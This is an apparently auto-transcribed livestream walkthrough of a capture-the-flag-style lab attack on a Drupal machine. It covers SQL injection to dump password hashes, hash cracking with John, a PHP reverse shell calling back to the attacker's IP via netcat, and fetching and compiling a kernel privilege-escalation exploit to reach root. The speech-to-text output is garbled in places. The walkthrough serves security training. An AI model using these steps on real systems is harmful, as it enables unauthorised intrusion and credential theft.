A mí me da ansiedad.
Twitch. Um, so we are live or not? Yeah, it seems that we are live. I want to verify it. Yes. I want to verify it. Yes. Okay. Hi everyone. Welcome to. Hi everyone. The streaming night. Hi everyone. Sorry. Yeah. Welcome to the streaming night. Today we are going to perform an attack intrusion and obtain the root user administrator for target machine that is stored inside of the mm, company that is very famous if you follow my channel because we are working around this company, Doorback. Okay, it's um, process that include validate the open ports on the target machine with the nmap. You should review or verify the web HTTP, and you can find an ERP. It's a CMS, very famous CMS. It's a Drupal machine. Um, we found an injection of SQL that is vulnerable using get petition. Um, with this SQL injection, you can obtain the credentials that belong to a couple of users, and one of them could be decrypted using John. Um, this is the way that you can access to the administrator interface. The second step is upload or execute a PHP code over a web form that is stored on this CMS Drupal, and obtain a reverse shell. So when you can access directly with the user 3W data, after a very harder review of the operating system, you can find that the kernel it's vulnerable to an exploit that allows you to obtain the root user administrator and watch the final flag. So this is the description. Let me start with the process. The first one is sudo openvpn connect our VPN to jump to the target system. So it's inside of a company. For this reason, it's completely necessary using a previously hacked machine that allow you 7799, so 8899 for example, that allow you SSH connect. So 8899 2021. I don't remember what they explain it. Yes, this we should create a pivoting over over the system. So 99 99 99 no 8899. Yeah, sorry, I'm a little bit yeah, this one could be 8899. Yeah, not routed to host. Yeah, because maybe I have another IP. So if config it's 20, it's the number 5. Yeah, so this is the number 5 to my target machine. So at this moment we can configure our local proxy in order to net start to pipe grep the port 8899. Yeah, in order to configure our network to access to this port. So beam, it's sudo beam etc. Yeah, let me see, it's 8899. This is the port that we are looking for, 8899. Yes, so proxy change, for example, Firefox. Proxy change Firefox. Yeah, so the proxy should be changed. Proxy settings, manual proxy, no, auto detect. Yeah. Okay, I don't say you the target machine is Terminator. Yeah. Split vertically the streaming. Yeah. So encadir the 192.168.1.134. Yeah, cd this machine, encadir and map scripts data and exploits. This is our working directory. Yeah, inside of nmap we are going to perform the attack, the recognition proxy change analysis with nmap. Yeah, this could be nice, and start to review. It's working, but find two open ports that they are the HTTP and HTTPS. There are no other open ports, and we don't know when to wait for the scan. So this is the ERP, who we are, testd, yeah, upload. So shell, yeah, who we are. This is the portal that don't allow you do anything. But what happened? Here, this param, it's vulnerable to SQL injection. So SQL, for example, anything. Yep. So say exception syntax. You have an error on your SQL syntax that say you anything, add line, select from anything, data. So this sorry this is a query that allows you execute an injection and execute your own code. This is a value that is directly not validated and stored in order to go to another form, for example this 9, and obtain for database the name of the formulary. So we can perform something like 1 or 1 equals 1. So this welcome to ERP, and we can change this value for anything that we want because our condition allows you a true value. For this reason, show you the response. So after a revision that I'm going to explain you when we can access to the machine how to perform this SQL injection, I found that this SQL injection showed you the user that contains, let me change it, the user stored on database. Yeah, let me see. So yeah, as you can see in this query, we concat after the end and union all select UID, name and password for user where UID is equal to 1. So, and this is the UID, this is the admin user, and this is the credentials encrypted or hashing stored at database. So there are a couple of users that show you this password. This is another user with UID 2. His name is John, and this is his password. So using this, we can create echo this. So for example, John user to a file has user John .txt that with John we can perform hash user John txt load one password drupal 7 utf8 no password hashes. So yeah, because I cracked it before and it's the memory. This is the user and this is the credentials. So we are going to access to the login user is user login URL. So with user John we can access with these credentials. Say don't save. Okay, member for 2 years and 5 months. It's a little bit older. So we can go to content and add the new content. So a web form that allow you form test, yeah, preview form test, save. So this form test could contain at form string a PHP code. This PHP code allow us to get directly access to the system using phpreverseshell. So let me review the phpreverseshell that we can include will be this. So we can perform something like print exec php, so like this, yeah. So another one could be oof, I want to copy this from payloads, all the things, uh, payloads, all the things, reverse so php this one for example could be nice. Seems that I like it. So this is my attacker IP, that is 10 11 12, and if config 12.5. So 5, the port for example 4545. This will be without php.r, yeah. So let me change it at the end. We modify this, and the other line that I put could be what for example this one. So I make this test because at the init it don't work to me. Dot 5 and port 4545. Yes. Save configuration. For components, for example text field, we want to upload a file. add upload file, yeah. add, yeah. Upload file, description, upload and access. So this allow upload this all kind of files, yeah. This spy wrapper ccs class save component, yeah. Something conditional emails, anything else I think is safe. We can go to the form test, yeah. This is the form test, the number node 25. So node, yeah, 25. We can upload this, upload. We can start to listen, netcat and blp, so the port 4545, and the magic happens here. ID, who am I, 3w data. So the first one is spawn a reverse shell, spawn a shell, interactive, spawn tte cell. So with Python we can use this one for example. I don't know if Python 3 is allowed on the, yeah. So who am I, ID, nice. So if we go to the this is there are a process of privilege escalation of hardware review, but we can go to this cd home phone c yes oh cd home Kali user, sorry. So we need share this file that is a bash script that shows you the potential you name a you name minus a, yeah, the potential exploits for this kernel version of the Linux machine of this Debian that is of 2070 GR. Okay, we can perform wget http. So shit http 10 11 11 12 10 11 12 5 at port 9090, and the file is less.sh. So broken pipe, it seems that something went wrong. Yeah, grep. What happened? ls yeah, less sh, yeah. So what is the problem? 10 12 5 at port 9090, and the name of the file is cannot permission deny. Okay, because I don't read the things. I so this command worked properly, but not in the right place. So at tmp we can execute, so maybe encadir test cd test. So clear export term. I don't know if this is going to work. Extern, yeah. So clear, yeah. So we can perform this again, yeah. This is our script. It's mod.x to sh, yeah. Now we have permission for execute, yeah, and this is the execute of exploit of the script. So after review, this is the exploit that allow us gain privilege escalation. So we can go to the home Kali and download this. Wget this, yeah, is downloaded. So now we need in this machine there is an installed the command gcc is not installed, so we need to open this cat 40. Let me see, cat 45 this. So cat this, and at the init of the exploit explain you how to compile it. That I think is the easy way without parameters, but I want to verify it. So yes, like this. This is the easy way. So we need rename this to exploit.c, and we can do this. Yeah, for example, exploit.c. This is the exploit. Right now, using the same Python HTTP server, we can get HTTP. So 10, 11, 12, 5. I port this with this exploit. We have this at local, chmod.x. So this CVE, we can perform the privilege escalation. ID, who am I? I'm a root of the target machine. CD, yeah, root. So cat the flag .txt. Yeah, well done. Brilliant. Yeah. The SQL injection. We are going to access to the database, so we can maybe spawn a new cell here. Yeah, bin bash, maybe better. So we can do cd bar 3w html. Yeah, so web config. If we review web config, yes, here, so the user, yeah, is in at settings php. We can show this file, I think at the init, maybe, yeah, we can find the database configuration that is important at this moment for us. So we are going to put here, and with MySQL command -u db user -p for the password and the database. We can access to this database instance, so tables, yeah, and the table that we want to know is this. Oh shit, we have a problem. I close the terminal, go back to the form, here, upload, so submit. So yes, we are inside. For this we don't need be root again, so this has been mass. So mysql dot u, so the user p, the name of the database is d7db. So where are you? Here, the password is here. So as we said before, want to select from users. This is the table. We can do select from users \g in order to review this better, but we want the UID, the name, and the password. So we can perform this query, UID, name, and the pass value from users. Yeah, this is this table, and we want to review again the SQL injection that says you name pass from user array blah blah blah, says you that the thing that you put here is the name that appear for you at the front end. No, in that case we are at 25 node. So if we came here and put this and put number 25, we form test that is the name of our formulary. Yeah, nice, but we don't want this. We want an SQL injection. So at this point we can say this name union all select or previous select, yeah, from users. Different number of columns. This is the problem. For this reason we use a grep or a where clause UID equals to 1. Yep. So select a statement have a different number of columns because yeah, sorry, different number of columns, not different numbers of rows, that we need to perform a concat of UID, name, and pass from users where UID is equal to 1. So we obtain two files. The first one is the title, and the second one is the concat of the values that we want. For this reason, if we execute this directly at the front end, it not appear the content that we want. So appear from test because it's the first one here. But what happen if we change this 25 for a unknown value, for example -9999? That show you this because the -999 not exist at the database. So this is the injection that we can check here For example, this is not exist, and we can union all UID. Yeah, and this is the title, the value that we want. So the second one is, for example, number 2. It's a select, no, not elect. Yeah, the number 2 is this. So the UID, the user John, and the credential hashed. So this is all for today. I think that you learn with this. I hope see you later. Goodbyes. We are going to close it.